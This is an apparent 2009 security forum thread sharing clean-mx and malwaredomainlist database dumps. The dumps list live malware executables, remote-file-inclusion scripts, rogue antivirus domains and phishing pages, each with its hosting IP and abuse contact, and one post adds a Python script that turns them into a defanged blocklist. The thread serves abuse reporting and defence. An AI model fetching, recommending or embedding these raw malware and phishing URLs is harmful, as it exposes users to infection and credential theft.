| 2009-07-01 17:53:46 | unknown_html | 74.125.39.137 | arin-contact@google.com | US | ARIN | GOOGLE | http://gonzalescatotu1980.googlegroups.com/web/Index5.html?gda=cBF7lz4AAAARaEn3MxokYleE6Hyh4HtUca9u6gwhXeLk4pJUM2UELU7SxctPdWbMD_zd-_UpXtjjsKXVs-X7bdXZc5buSfmx |
| 2009-07-01 17:53:46 | unknown_html | 74.125.39.137 | arin-contact@google.com | US | ARIN | GOOGLE | http://belldenyhe1985.googlegroups.com/web/Index5.html?gda=OeMRPz4AAAB_pc5n6AdBZ8kMenK1w222XRWzDTlLBoPitQCAWlwmUU7SxctPdWbMD_zd-_UpXtjjsKXVs-X7bdXZc5buSfmx |
| 2009-07-01 17:53:46 | unknown_html | 216.108.235.39 | noc@premianet.com | US | ARIN | PREMIANET | http://bude.comoj.com/news.html?bshKTPnjLdI |
| 2009-07-01 17:53:46 | unknown_html | 216.108.235.73 | noc@premianet.com | US | ARIN | PREMIANET | http://nettecicek.comli.com/news.html?TWtzUJT |
| 2009-07-01 17:53:46 | unknown_html | 97.74.144.107 | abuse@godaddy.com | US | ARIN | GO-DADDY-SOFTWARE-INC | http://daminiartisans.com/qwality.html?jrmoghclti |
| 2009-07-01 17:53:46 | unknown_html | 194.170.187.32 | abuse@emirates.net.ae | AE | RIPE | EXCHANGE-EMIRNET | http://www.panache.ae/qwality.html?UnaavJfswLfmcBP |
| 2009-07-01 17:53:46 | unknown_html | 168.143.174.29 | abuse@ntt.net | US | ARIN | NTTA-168-143 | http://bit.ly/JDotw |
| 2009-07-01 17:53:47 | unknown_html | 72.167.232.202 | abuse@godaddy.com | US | ARIN | GO-DADDY-SOFTWARE-INC | http://www.pinkgingershop.com/images/1/2/3/4/buy.html |
| 2009-07-01 17:53:47 | unknown_html | 77.238.160.254 | uk-abuse@cc.yahoo-inc.com | GB | RIPE | CH-YAHOO | http://profiles.yahoo.com/blog/MZKZ4EJAQDE4QD7CWXDRDMKSJY?eid=KxQqejs3n3jZokVUNcRK5zSW4lDFBvetF8eu0PPTnvcgvE2IAg |
| 2009-07-05 23:57:26 | unknown_html | 211.244.22.30 | kidc@hanbiro.com | KR | APNIC | KRNIC-KR | http://softwarekeysmartphones.com/Corel.php |
| 2009-07-10 14:05:44 | unknown_html | 92.241.176.188 | abuse@netplace.ru | RU | RIPE | NETPLACE | http://advanced-virus-remover2009.com/terms.php??code=00000000 |
| 2009-07-10 14:05:44 | unknown_html | 88.198.105.145 | abuse@hetzner.de | DE | RIPE | DE-HETZNER-20051227 | http://antiviruslicensepurchase.com/en.gif |
| 2009-07-10 14:05:45 | unknown_html | 87.118.86.125 | abuse@keyweb.de | DE | RIPE | DE-KEYWEB-IV | http://goldtraf.su/showbanner.php?kod=920098&site=www.test.ru |
| 2009-07-10 14:05:45 | unknown_html | 202.101.42.130 | anti-spam@ns.chinanet.cn.net | CN | APNIC | CHINANET-SH | http://tong-ji.com/sj19.htm |
| 2009-07-10 14:05:45 | unknown_html | 202.101.42.130 | anti-spam@ns.chinanet.cn.net | CN | APNIC | CHINANET-SH | http://tong-ji.com/index.htm |
+---------------------+--------------+----------------+------------------------------+---------+--------+-----------------------+-----------------------------------------------------------------------------------------------------------------------------------------------------------------+
60 rows in set (0.43 sec)
-
see also http://support.clean-mx.de/clean-mx/viruses?response=alive
Hi Gerhard,
Interesting database. I didn't know it.
-
Hi
we maintain three databases
phishing-> http://support.clean-mx.de/clean-mx/phishing.php?sort=id%20desc&response=alive
abused servers/platforms -> http://support.clean-mx.de/clean-mx/portals.php?sort=id%20desc&response=alive
and malware -> http://support.clean-mx.de/clean-mx/viruses.php?sort=id%20desc&response=alive
We notify network abuse contacts and national CERTs to close down these activities....
It would be fine to get a constant feed from malwaredomainlist....
update:
you may query only for currently still active malwaredomainlist URLs with:
http://support.clean-mx.de/clean-mx/viruses.php?sort=id%20desc&response=alive&sub=sub4
if you omit &response=alive, you will get all ....
-- gerhard
-
another bunch... including RFIs
xml:
http://support.clean-mx.de/clean-mx/xmlviruses?response=alive&sub=sub5&fields=virusname,review,url&sort=url%20asc&format=xml
csv:
http://support.clean-mx.de/clean-mx/xmlviruses?response=alive&sub=sub5&fields=virusname,review,url&sort=url%20asc&format=csv
-- gerhard
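As an added example (not code from this thread, from malwaredomainlist or from clean-mx), the script below parses the MySQL-style table dumps pasted in the posts above into records, normalises the hxxp:// and [.] defanging that other posts in the thread use, and derives two things a list consumer actually wants: a de-duplicated host blocklist and the live URLs grouped by the abuse mailbox from the dump, which is the notification step Gerhard describes. SAMPLE_DUMP is a constructed subset of rows copied from the thread's own tables (one of them has an empty email cell, as in the real data, and one has a space inside the URL). For the CSV feed linked above, csv.DictReader over the fields virusname,review,url would replace parse_dump; the exact quoting of that feed is not shown on this page, so that substitution is an assumption.

```python
"""Parse MySQL-style table dumps (as pasted in this thread) into records,
then build a defanged host blocklist and a per-abuse-contact URL list."""
from collections import defaultdict
from urllib.parse import urlsplit

# Constructed sample: a subset of rows from the thread's tables, same shape.
SAMPLE_DUMP = """\
+---------------------+---------+-------------------+-----------------+------------------------+---------+--------+-----------------------------+---------------------------------------------------------------+
| timestamp           | scanner | virusname         | review          | email                  | country | source | netname                     | url                                                           |
+---------------------+---------+-------------------+-----------------+------------------------+---------+--------+-----------------------------+---------------------------------------------------------------+
| 2009-05-25 17:55:09 | avira   | DR/FakeAV.MX      | 221.5.74.38     | abuse@cnc-noc.net      | CN      | APNIC  | CNCGROUP-GD                 | http://dl.guarddog2009.com/av.exe                             |
| 2009-06-30 14:01:49 | avira   | TR/Dldr.Fake.CGAV | 76.76.103.164   | abuse@existhosting.com | CA      | ARIN   | INTERWEB-MEDIA              | http://guardlab2009.biz//InstallerWF.exe                      |
| 2009-06-30 14:01:49 | avira   | TR/Dldr.Fake.CGAV | 76.76.103.164   | abuse@existhosting.com | CA      | ARIN   | INTERWEB-MEDIA              | http://guardlab2009.net//InstallerWF.exe                      |
| 2009-07-14 09:57:02 | avira   | TR/Buzus.bntm     | 212.117.166.78  | abuse@root.lu          | LU      | RIPE   | SERVER-LU                   | http://212.117.166.78/ausverkauf.exe                          |
| 2009-07-18 23:57:53 | avira   | SPR/PHP.ID        | 195.117.130.224 |                        | PL      | RIPE   | FIRMA-MUCHA-KRZYSZTOF-MUCHA | http://www.ksi-klasa.pl//104/Rosid.txt                        |
| 2009-07-19 17:56:40 | undef   | unknown_html      | 94.23.1.47      | abuse@ovh.net          | FR      | RIPE   | OVH                         | http://www.lestoquesdeladalle.com/images/download stub32i.exe |
+---------------------+---------+-------------------+-----------------+------------------------+---------+--------+-----------------------------+---------------------------------------------------------------+
6 rows in set (0.00 sec)
"""


def refang(url):
    """Undo the hxxp:// and [.] defanging used in other posts of the thread."""
    u = url.strip()
    if u.lower().startswith("hxxp"):
        u = "http" + u[4:]
    return u.replace("[.]", ".")


def defang(url):
    """Render a URL so it cannot be clicked or auto-linked when shared."""
    p = urlsplit(refang(url))
    out = f"{p.scheme.replace('http', 'hxxp')}://{p.netloc.replace('.', '[.]')}{p.path}"
    if p.query:
        out += "?" + p.query
    if p.fragment:
        out += "#" + p.fragment
    return out


def parse_dump(text):
    """One dict per data row; the first '|' line is the header.
    '+---' rulers and the 'N rows in set' trailer are skipped. A '|' inside
    the last column (some exploit-kit stat= URLs contain them) is re-joined
    instead of producing extra columns."""
    header, rows = None, []
    for line in text.splitlines():
        if not line.startswith("|"):
            continue
        cells = [c.strip() for c in line.split("|")[1:-1]]
        if header is None:
            header = cells
            continue
        if len(cells) > len(header):
            cells = cells[:len(header) - 1] + ["|".join(cells[len(header) - 1:]).strip()]
        rows.append(dict(zip(header, cells)))
    return rows


def hosts(records):
    """Sorted, de-duplicated hostnames/IPs for a DNS or proxy blocklist."""
    return sorted({urlsplit(refang(r["url"])).hostname for r in records if r.get("url")})


def by_abuse_contact(records):
    """Defanged URLs grouped by the abuse mailbox in the dump. Rows with an
    empty email cell (they exist in the data) go under '(no contact)'."""
    groups = defaultdict(list)
    for r in records:
        groups[r.get("email") or "(no contact)"].append(defang(r["url"]))
    return {k: sorted(v) for k, v in groups.items()}


if __name__ == "__main__":
    recs = parse_dump(SAMPLE_DUMP)
    print("\n".join(hosts(recs)))
    for contact, urls in by_abuse_contact(recs).items():
        print(contact, urls)
```

The host list is what goes into a resolver or proxy denylist; the per-contact grouping is what goes into an abuse report. Both keep the raw URL out of anything that might auto-link it.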
-
Sites used by the braviax/brastk family to distribute rogues
Home-av-2010.com
Home-av2010.com
Homeav2010.com
Home-anti-virus-2010.com
Homeantivirus2010.com
Home-antivirus2010.com
Homeanti-virus-2010.com
Home-anti-virus2010.com
Homeanti-virus2010.com
Homeantivirus-2010.com
Pc-security09.com
Pcsecurity09.com
Pcsecurity-09.com
-
some malware
+----------------------+------------+-----------------------------------------------------------+-----------------+------------------------------+---------+--------+-----------------------------+--------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------+
| from_unixtime(first) | scanner | virusname | review | email | country | source | netname | url |
+----------------------+------------+-----------------------------------------------------------+-----------------+------------------------------+---------+--------+-----------------------------+--------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------+
| 2009-07-19 17:56:40 | undef | unknown_html | 94.23.1.47 | abuse@ovh.net | FR | RIPE | OVH | http://www.lestoquesdeladalle.com/images/download stub32i.exe |
| 2009-07-18 23:57:53 | undef | unknown_html_RFI_php | 80.237.132.88 | net-abuse@hosteurope.de | DE | RIPE | HE-SH-CGN-NET | http://www.silencio-dinklage.de//redaxo/include/classes/id3.txt |
| 2009-07-18 23:57:53 | avira | PHP/BDS/H.C | 194.135.105.25 | ip-reg@ripn.net | RU | RIPE | RU-RELCOM-194-135 | http://www.gosstroy.com/images/kampret.jpg |
| 2009-07-18 23:57:53 | avira | PHP/Pbot.A | 89.111.176.103 | abuse@hc.ru | RU | RIPE | CENTROHOST-NET | http://www.guardian-psj.ru/assets/media/X |
| 2009-07-18 23:57:53 | undef | unknown_html_RFI_php | 81.12.13.152 | mzargar@yahoo.com | IR | RIPE | SINET-SHARIATI | http://www.iran-eschool.com//images/shirohige/fxid.txt |
| 2009-07-18 23:57:53 | avira | SPR/PHP.ID | 195.117.130.224 | | PL | RIPE | FIRMA-MUCHA-KRZYSZTOF-MUCHA | http://www.ksi-klasa.pl//104/Rosid.txt |
| 2009-07-18 23:57:50 | undef | unknown_html_RFI_php | 89.96.184.80 | abuse@fastweb.it | IT | RIPE | FASTWEB-LINKEM | http://www.acb.bs.it/fad/test.txt |
| 2009-07-18 23:57:49 | undef | unknown_html_RFI_php | 82.197.131.52 | abuse@attractsoft.com | DE | RIPE | LNC-ATTRACTSOFT-GMBH | http://segurancabradesco.awardspace.com/cmd_inc.htm |
| 2009-07-18 23:57:48 | avira | SPR/PHP.ID | 83.137.192.222 | bas@superior.nl | NL | RIPE | SUPERIOR-NL | http://partycentrumdemolen.nl//mambots/system/osyid.txt |
| 2009-07-18 19:39:18 | avira | EXP/Pidief.UA | 195.88.191.46 | cardiro@cardiro.org | RU | RIPE | BIGNESS-GROUP-NET | http://yawxowaj.cn/22/oldBelow.pdf |
| 2009-07-18 19:39:18 | undef | unknown_exe | 85.17.162.217 | abuse@leaseweb.com | NL | RIPE | LEASEWEB | http://v-i-e-w.net/xrun.tmp |
| 2009-07-18 19:39:18 | avira | TR/Crypt.ZPACK.Gen | 72.26.101.150 | dnsadmin@alchemy.net | US | ARIN | ALCH | http://installmoney.com/svchost.exe |
| 2009-07-18 19:39:18 | avira | TR/Dropper.Gen | 74.54.241.100 | abuse@theplanet.com | US | ARIN | NETBLK-THEPLANET-BLK-14 | http://theinstalls.com/files/uprograms/dailybucks/dailybucks_install.exe |
| 2009-07-18 19:39:18 | undef | unknown_exe | 63.134.244.77 | abuse@crystaltech.com | US | ARIN | CRYSTALTECH-BLK-6 | http://dapda.cn/setup.exe |
| 2009-07-18 19:39:18 | undef | unknown_exe | 74.54.241.100 | abuse@theplanet.com | US | ARIN | NETBLK-THEPLANET-BLK-14 | http://theinstalls.com/files/uprograms/dailybucks/install.48349.exe |
| 2009-07-18 19:39:18 | avira | TR/Dropper.Gen | 212.117.174.14 | abuse@root.lu | LU | RIPE | SERVER-LU | http://212.117.174.14/installnew2.exe |
| 2009-07-18 19:39:18 | clamav | PHP.Bot | 66.7.213.211 | abuse@dimenoc.com | US | ARIN | DIMECNET | http://www.intel9.com.br/ircbot/Q.txt |
| 2009-07-18 03:03:10 | avira | BDS/Agent.1260.A | 67.186.51.77 | abuse@comcast.net | US | ARIN | ATT-COMCAST | http://c-67-186-51-77.hsd1.oh.comcast.net/card.exe |
| 2009-07-17 22:01:50 | undef | unknown_html_RFI_php | 124.0.159.141 | ip-tech@sknetworks.co.kr | KR | APNIC | SKNETWORKS | http://www.seokrim.ms.kr//data/shirohige/zfxid.txt |
| 2009-07-17 22:01:50 | clamav | PHP.Id-5 | 80.93.54.68 | abuse@peterhost.ru | RU | RIPE | PETERHOST-PITER | http://www.1remont.ru/readme.txt |
| 2009-07-17 22:01:40 | avira | DR/PSW.Zapchast.zwrc.54 | 193.218.160.67 | waqar@gigo.co.uk | GB | RIPE | GIGOSYSTEM | http://193.218.160.67/~PlcmSpIp/postcard.jpg.exe |
| 2009-07-17 17:02:42 | avira | DR/PSW.Zapchast.zwrc.116 | 210.188.255.10 | abuse@odn.ad.jp | JP | APNIC | JPNIC-NET-JP | http://210.188.255.10/~yamazaki/MichaelJackson.jpg.exe |
| 2009-07-16 23:06:00 | undef | unknown_exe | 69.174.115.139 | abuse@comcast.net | US | ARIN | COMCAST-ADEL-69-174-0-0 | http://www.24-7agtv.com/hotshotsvideoproductions.com/templates/ja_rochea/scripts/ja.script.js |
| 2009-07-16 23:04:53 | undef | unknown_exe | 220.248.172.39 | abuse@cnc-noc.net | CN | APNIC | CNC-Hunan-province | http://win3821.com/SmartDownload.exe |
| 2009-07-16 17:46:11 | avira | EXP/PHP.E | 201.144.241.226 | abuse@uninet.net.mx | MX | LACNIC | MX-REUN-LACNIC | http://www.centralfilms.net/cgi/bots/red.txt |
| 2009-07-16 17:45:45 | clamav | PHP.Id | 221.143.46.104 | abuse@hanaro.com | KR | APNIC | HANANET | http://impeel.com/impeel/wizard/r0x-id.txt |
| 2009-07-16 03:56:24 | undef | unknown_exe | 213.165.82.102 | abuse@oneandone.net | DE | RIPE | SCHLUND-CUSTOMERS | http://www.lux-luxury.com/templates/ja_teline_ii/js/ja.script.js |
| 2009-07-16 03:56:03 | avira | TR/Spy.Banker.BAC.1 | 194.0.252.241 | abuse@vooservers.com | GB | RIPE | vooservers | http://194.0.252.241/.../Bradescompleto.scr |
| 2009-07-14 18:58:01 | trendmicro | TSPY_ZBOT.MCS | 61.235.117.83 | wangpei@chinatietong.com | CN | APNIC | CRTC | http://allavers.org/_vps_lib/ldr.exe |
| 2009-07-14 18:58:00 | avira | TR/FraudPack.any | 72.34.43.224 | admin@ihnetworks.net | US | ARIN | IHNET-PI-1 | http://arkbroadcasters.org/loader.exe |
| 2009-07-08 15:01:11 | avira | TR/Dropper.Gen | 210.51.181.129 | cncipaddr@china-netcom.com | CN | APNIC | CNC-BJ-IDC | http://youtube-adult.name/id_0122.exe |
| 2009-07-06 19:04:09 | undef | unknown_exe | 82.103.141.146 | abuse@easyspeedy.com | DK | RIPE | EASYSPEEDY-NETWORK | http://www.ymmoo.net/setup_ymmoo.exe |
| 2009-07-01 17:53:46 | undef | unknown_exe | 74.125.39.137 | arin-contact@google.com | US | ARIN | GOOGLE | http://kodenadaqequnul2.googlegroups.com/web/a289743kjhfkjhkj3hkj.swf?gda=q-N2NUsAAACuGiGjtYknYpnLJ9JOD6VhQaFUmokO1f_8pAMqUmUp_d812b7JYV_uUBJlRIiigwRbYpQIvmf_l9f_E8k9I2rxBkXa90K8pT5MNmkW1w_4BQ |
| 2009-06-30 14:01:50 | undef | unknown_exe | 208.113.150.124 | abuse@dreamhost.com | US | ARIN | DREAMHOST-BLK6 | http://palsol.com/downloads/spyrem_setup.exe |
| 2009-06-30 14:01:50 | undef | unknown_exe | 64.208.226.93 | abuse@gblx.net | US | ARIN | GBLX-11A | http://privacy-care.com/bin/SpywareExpertInstall.exe |
| 2009-06-30 14:01:50 | avira | TR/Dldr.Agent.yhp | 217.76.156.92 | abuse@tpnet.pl | PL | RIPE | NET-PIENSASOLUTIONS-2 | http://sapacontenedores.com/get_flash_update.exe |
| 2009-06-30 14:01:50 | undef | unknown_exe | 70.38.54.20 | abuse@noc.privatedns.com | CA | ARIN | IWEB-BLK-05 | http://spyremover.com/downloads/SpyRemoverSetup.exe |
| 2009-06-30 14:01:50 | avira | TR/Crypt.ZPACK.Gen | 62.149.174.149 | hostmaster@technorail.com | IT | RIPE | TECHNORAIL-NET | http://www.artistinove.it/shok_video.exe |
-
another bunch of malware links since 19th of July 2009
-
and all malware @ripway.com
| 2009-07-21 13:25:08 | avira | TR/Dropper.Gen | 64.62.181.46 | abuse@he.net | US | ARIN | HURRICANE-4 | http://h1.ripway.com/roixahinhbong/inst_speeder.exe |
| 2009-07-21 13:25:07 | undef | unknown_html | 64.62.181.46 | abuse@he.net | US | ARIN | HURRICANE-4 | http://h1.ripway.com/rapidchare/login.php? |
| 2009-07-21 13:25:07 | undef | unknown_html | 64.62.181.46 | abuse@he.net | US | ARIN | HURRICANE-4 | http://h1.ripway.com/rapiddshar |
| 2009-07-21 13:25:07 | undef | unknown_html | 64.62.181.46 | abuse@he.net | US | ARIN | HURRICANE-4 | http://h1.ripway.com/rapiddshar/ |
| 2009-07-21 13:25:07 | undef | unknown_html | 64.62.181.46 | abuse@he.net | US | ARIN | HURRICANE-4 | http://h1.ripway.com/rapiidshare |
| 2009-07-21 13:25:06 | undef | unknown_html | 64.62.181.46 | abuse@he.net | US | ARIN | HURRICANE-4 | http://h1.ripway.com/premansini/friendsterz/friendster.html |
| 2009-07-21 13:25:06 | avira | TR/Crypt.XPACK.Gen | 64.62.181.46 | abuse@he.net | US | ARIN | HURRICANE-4 | http://h1.ripway.com/pri55ce/wep-top/wep.exe |
| 2009-07-21 13:25:06 | avira | TR/Dropper.Gen | 64.62.181.46 | abuse@he.net | US | ARIN | HURRICANE-4 | http://h1.ripway.com/q1qfr/a.exe |
| 2009-07-21 13:25:06 | avira | TR/Dropper.Gen | 64.62.181.46 | abuse@he.net | US | ARIN | HURRICANE-4 | http://h1.ripway.com/q28y/calculator33.exe |
| 2009-07-21 13:25:06 | avira | TR/Crypt.XPACK.Gen | 64.62.181.46 | abuse@he.net | US | ARIN | HURRICANE-4 | http://h1.ripway.com/q28y/lol%20has%20been%20fucked.exe |
| 2009-07-21 13:25:06 | avira | TR/Drop.Stabs.aap | 64.62.181.46 | abuse@he.net | US | ARIN | HURRICANE-4 | http://h1.ripway.com/q8888p/obadah.scr |
| 2009-07-21 13:25:06 | avira | TR/Crypt.XDR.Gen | 64.62.181.46 | abuse@he.net | US | ARIN | HURRICANE-4 | http://h1.ripway.com/qwe020/bound.exe |
| 2009-07-21 13:25:06 | avira | BDS/Poisonivy.E.3 | 64.62.181.46 | abuse@he.net | US | ARIN | HURRICANE-4 | http://h1.ripway.com/rabmunna/josh.com |
| 2009-07-21 13:25:06 | undef | unknown_html | 64.62.181.46 | abuse@he.net | US | ARIN | HURRICANE-4 | http://h1.ripway.com/rapidchare/login.php |
| 2009-07-21 13:25:05 | avira | TR/Spy.Agent.AHAB | 64.62.181.46 | abuse@he.net | US | ARIN | HURRICANE-4 | http://h1.ripway.com/paltalk2009/al%20jazeera%20sport%20player%202.0.exe |
| 2009-07-21 13:25:05 | avira | DR/Delphi.Gen | 64.62.181.46 | abuse@he.net | US | ARIN | HURRICANE-4 | http://h1.ripway.com/paltalk2009/art%20sport.exe |
| 2009-07-21 13:25:05 | avira | TR/VB.kmt.37 | 64.62.181.46 | abuse@he.net | US | ARIN | HURRICANE-4 | http://h1.ripway.com/paltalk2009/kooora%20canal%201.1.exe |
| 2009-07-21 13:25:05 | avira | TR/Spy.Agent.AHAB | 64.62.181.46 | abuse@he.net | US | ARIN | HURRICANE-4 | http://h1.ripway.com/paltalk2009/star%20monitor%201.0.exe |
| 2009-07-21 13:25:05 | avira | BDS/Bifrose.akbc | 64.62.181.46 | abuse@he.net | US | ARIN | HURRICANE-4 | http://h1.ripway.com/paltalk2009/toolbar-kooora.exe |
| 2009-07-21 13:25:05 | avira | TR/VB.kmt.7 | 64.62.181.46 | abuse@he.net | US | ARIN | HURRICANE-4 | http://h1.ripway.com/paltalk2009/tv%20player%201.2%20champions%20league.exe |
| 2009-07-21 13:25:05 | avira | TR/VB.kmt.9 | 64.62.181.46 | abuse@he.net | US | ARIN | HURRICANE-4 | http://h1.ripway.com/paltalk2009/uefa%20champions%20league%20player.exe |
| 2009-07-21 13:25:05 | avira | TR/VB.kmt.37 | 64.62.181.46 | abuse@he.net | US | ARIN | HURRICANE-4 | http://h1.ripway.com/paltalk2009/wydad%20xp%201.0.exe |
| 2009-07-21 13:25:05 | avira | TR/TDss.agfj | 64.62.181.46 | abuse@he.net | US | ARIN | HURRICANE-4 | http://h1.ripway.com/panoky/conreport.pdf |
| 2009-07-21 13:25:05 | undef | unknown_html | 64.62.181.46 | abuse@he.net | US | ARIN | HURRICANE-4 | http://h1.ripway.com/paypai/www.paypal.com |
| 2009-07-21 13:25:05 | undef | unknown_html | 64.62.181.46 | abuse@he.net | US | ARIN | HURRICANE-4 | http://h1.ripway.com/PayPaILogin |
| 2009-07-21 13:25:05 | undef | unknown_html | 64.62.181.46 | abuse@he.net | US | ARIN | HURRICANE-4 | http://h1.ripway.com/payplal/index.html |
| 2009-07-21 13:25:05 | avira | DR/bvb.SAG | 64.62.181.46 | abuse@he.net | US | ARIN | HURRICANE-4 | http://h1.ripway.com/pic1/server.exe |
| 2009-07-21 13:25:04 | avira | TR/Dropper.Gen | 64.62.181.46 | abuse@he.net | US | ARIN | HURRICANE-4 | http://h1.ripway.com/omfgloldoom/rentnzm.exe |
| 2009-07-21 13:25:04 | avira | TR/ATRAPS.Gen | 64.62.181.46 | abuse@he.net | US | ARIN | HURRICANE-4 | http://h1.ripway.com/omfgloldoom/Tdialer.exe |
| 2009-07-21 13:25:03 | undef | unknown_html | 64.62.181.46 | abuse@he.net | US | ARIN | HURRICANE-4 | http://h1.ripway.com/newly14/Ancient%20Katana/login.html |
| 2009-07-21 13:25:03 | avira | BDS/Bifrose.begy | 64.62.181.46 | abuse@he.net | US | ARIN | HURRICANE-4 | http://h1.ripway.com/nic/suzan.jpg.exe |
| 2009-07-21 13:25:03 | undef | unknown_html | 64.62.181.46 | abuse@he.net | US | ARIN | HURRICANE-4 | http://h1.ripway.com/Oldfs02/index.html |
| 2009-07-21 13:25:02 | avira | TR/Dropper.Gen | 64.62.181.46 | abuse@he.net | US | ARIN | HURRICANE-4 | http://h1.ripway.com/nethom/tom%20clancys%20hawx%202009eng.exe |
| 2009-07-21 13:25:02 | avira | BDS/Bifrose.bbna.5 | 64.62.181.46 | abuse@he.net | US | ARIN | HURRICANE-4 | http://h1.ripway.com/new1111/keymaker.exe |
| 2009-07-21 13:25:02 | avira | TR/Drop.Stabs.aap | 64.62.181.46 | abuse@he.net | US | ARIN | HURRICANE-4 | http://h1.ripway.com/newhajar/hajarita.exe |
| 2009-07-21 13:25:00 | avira | SPR/Tool.CeeInject.36797J | 64.62.181.46 | abuse@he.net | US | ARIN | HURRICANE-4 | http://h1.ripway.com/mtall9/hii11.exe |
| 2009-07-21 13:25:00 | avira | BDS/Bifrose.akbc | 64.62.181.46 | abuse@he.net | US | ARIN | HURRICANE-4 | http://h1.ripway.com/mtall9/www.exe |
| 2009-07-21 13:25:00 | avira | DR/Bifrose.bazv.4 | 64.62.181.46 | abuse@he.net | US | ARIN | HURRICANE-4 | http://h1.ripway.com/nada12/face%20on%20body.exe |
| 2009-07-21 13:24:59 | avira | WORM/SdBot.DGAZ | 64.62.181.46 | abuse@he.net | US | ARIN | HURRICANE-4 | http://h1.ripway.com/movoo79606/11032009003.mp4.exe |
| 2009-07-21 13:24:59 | avira | TR/Dropper.Gen | 64.62.181.46 | abuse@he.net | US | ARIN | HURRICANE-4 | http://h1.ripway.com/movoo79606/20060428044.mp4.exe |
| 2009-07-21 13:24:59 | avira | TR/Dropper.Gen | 64.62.181.46 | abuse@he.net | US | ARIN | HURRICANE-4 | http://h1.ripway.com/movoo79606/20060428066.mp4.exe |
| 2009-07-21 13:24:59 | avira | TR/Agent.ckeq | 64.62.181.46 | abuse@he.net | US | ARIN | HURRICANE-4 | http://h1.ripway.com/movoo79606/mov010220.mpg.exe |
| 2009-07-21 13:24:59 | avira | DR/Delphi.Gen | 64.62.181.46 | abuse@he.net | US | ARIN | HURRICANE-4 | http://h1.ripway.com/mrcloner/svchost.exe |
| 2009-07-21 13:24:59 | avira | DR/Agent.hua | 64.62.181.46 | abuse@he.net | US | ARIN | HURRICANE-4 | http://h1.ripway.com/ms3leko/image982-gif.exe |
| 2009-07-21 13:24:59 | avira | WORM/IrcBot.jvw | 64.62.181.46 | abuse@he.net | US | ARIN | HURRICANE-4 | http://h1.ripway.com/mshm/imghp.exe |
| 2009-07-21 13:24:58 | avira | TR/Agent.colt | 64.62.181.46 | abuse@he.net | US | ARIN | HURRICANE-4 | http://h1.ripway.com/mov0009809/mov000117.mp4.exe |
| 2009-07-21 13:24:57 | avira | BDS/Bifrose.ZXE | 64.62.181.46 | abuse@he.net | US | ARIN | HURRICANE-4 | http://h1.ripway.com/majro7053/l7l.exe |
| 2009-07-21 13:24:57 | undef | unknown_html | 64.62.181.46 | abuse@he.net | US | ARIN | HURRICANE-4 | http://h1.ripway.com/malamhitam/fs.html |
| 2009-07-21 13:24:57 | avira | TR/Drop.Stabs.aap | 64.62.181.46 | abuse@he.net | US | ARIN | HURRICANE-4 | http://h1.ripway.com/mambabh/server.exe |
| 2009-07-21 13:24:57 | avira | BDS/Poison.zzg | 64.62.181.46 | abuse@he.net | US | ARIN | HURRICANE-4 | http://h1.ripway.com/mataz/noor.exe |
| 2009-07-21 13:24:57 | avira | TR/Dropper.Gen | 64.62.181.46 | abuse@he.net | US | ARIN | HURRICANE-4 | http://h1.ripway.com/mazouzi/server.exe |
| 2009-07-21 13:24:57 | avira | DR/Delphi.Gen | 64.62.181.46 | abuse@he.net | US | ARIN | HURRICANE-4 | http://h1.ripway.com/mbc111/aza.exe |
| 2009-07-21 13:24:57 | avira | TR/Dropper.Gen | 64.62.181.46 | abuse@he.net | US | ARIN | HURRICANE-4 | http://h1.ripway.com/metalrouge0/allchanneltv.exe |
| 2009-07-21 13:24:57 | avira | TR/Dropper.Gen | 64.62.181.46 | abuse@he.net | US | ARIN | HURRICANE-4 | http://h1.ripway.com/mlk055/lol.exe |
| 2009-07-21 13:24:57 | avira | BDS/Poison.ahap | 64.62.181.46 | abuse@he.net | US | ARIN | HURRICANE-4 | http://h1.ripway.com/mmffmmff/ssaass.exe |
| 2009-07-21 13:24:57 | undef | unknown_html | 64.62.181.46 | abuse@he.net | US | ARIN | HURRICANE-4 | http://h1.ripway.com/mobileslive/acceslivemobileconection.htm |
| 2009-07-21 13:24:57 | avira | TR/ATRAPS.Gen | 64.62.181.46 | abuse@he.net | US | ARIN | HURRICANE-4 | http://h1.ripway.com/MOD4SALE/AK47.exe |
| 2009-07-21 13:24:57 | avira | TR/Dropper.Gen | 64.62.181.46 | abuse@he.net | US | ARIN | HURRICANE-4 | http://h1.ripway.com/MOD4SALE/imbotpacked.exe |
| 2009-07-21 13:24:57 | avira | TR/ATRAPS.Gen | 64.62.181.46 | abuse@he.net | US | ARIN | HURRICANE-4 | http://h1.ripway.com/mod4sale/lol/server.exe |
| 2009-07-21 13:24:57 | avira | TR/ATRAPS.Gen | 64.62.181.46 | abuse@he.net | US | ARIN | HURRICANE-4 | http://h1.ripway.com/mod4sale/metusdelphi2.8/2.8finalmetus.exe |
| 2009-07-21 13:24:57 | avira | WORM/IrcBot.jvw | 64.62.181.46 | abuse@he.net | US | ARIN | HURRICANE-4 | http://h1.ripway.com/mona51/coffin.exe |
| 2009-07-21 13:24:56 | undef | unknown_html | 64.62.181.46 | abuse@he.net | US | ARIN | HURRICANE-4 | http://h1.ripway.com/liamh/test.php |
| 2009-07-21 13:24:56 | undef | unknown_html | 64.62.181.46 | abuse@he.net | US | ARIN | HURRICANE-4 | http://h1.ripway.com/live4free/login.html |
| 2009-07-21 13:24:56 | avira | TR/Dropper.Gen | 64.62.181.46 | abuse@he.net | US | ARIN | HURRICANE-4 | http://h1.ripway.com/loginhotmail/update.exe |
| 2009-07-21 13:24:56 | avira | TR/Dropper.Gen | 64.62.181.46 | abuse@he.net | US | ARIN | HURRICANE-4 | http://h1.ripway.com/lovemovie/sexhotcam.exe |
| 2009-07-21 13:24:56 | avira | TR/Drop.Stabs.aap | 64.62.181.46 | abuse@he.net | US | ARIN | HURRICANE-4 | http://h1.ripway.com/lovemovie/videosex.exe |
| 2009-07-21 13:24:56 | avira | TR/Dropper.Gen | 64.62.181.46 | abuse@he.net | US | ARIN | HURRICANE-4 | http://h1.ripway.com/majeeeed/8099.exe |
| 2009-07-21 13:24:55 | avira | TR/Spy.Banker.Gen | 64.62.181.46 | abuse@he.net | US | ARIN | HURRICANE-4 | http://h1.ripway.com/killerzim/Foto.jpg.exe |
| 2009-07-21 13:24:55 | avira | TR/Dropper.Gen | 64.62.181.46 | abuse@he.net | US | ARIN | HURRICANE-4 | http://h1.ripway.com/killerzim/wuauclt.exe |
| 2009-07-21 13:24:55 | undef | unknown_html | 64.62.181.46 | abuse@he.net | US | ARIN | HURRICANE-4 | http://h1.ripway.com/KINGZW/index.php |
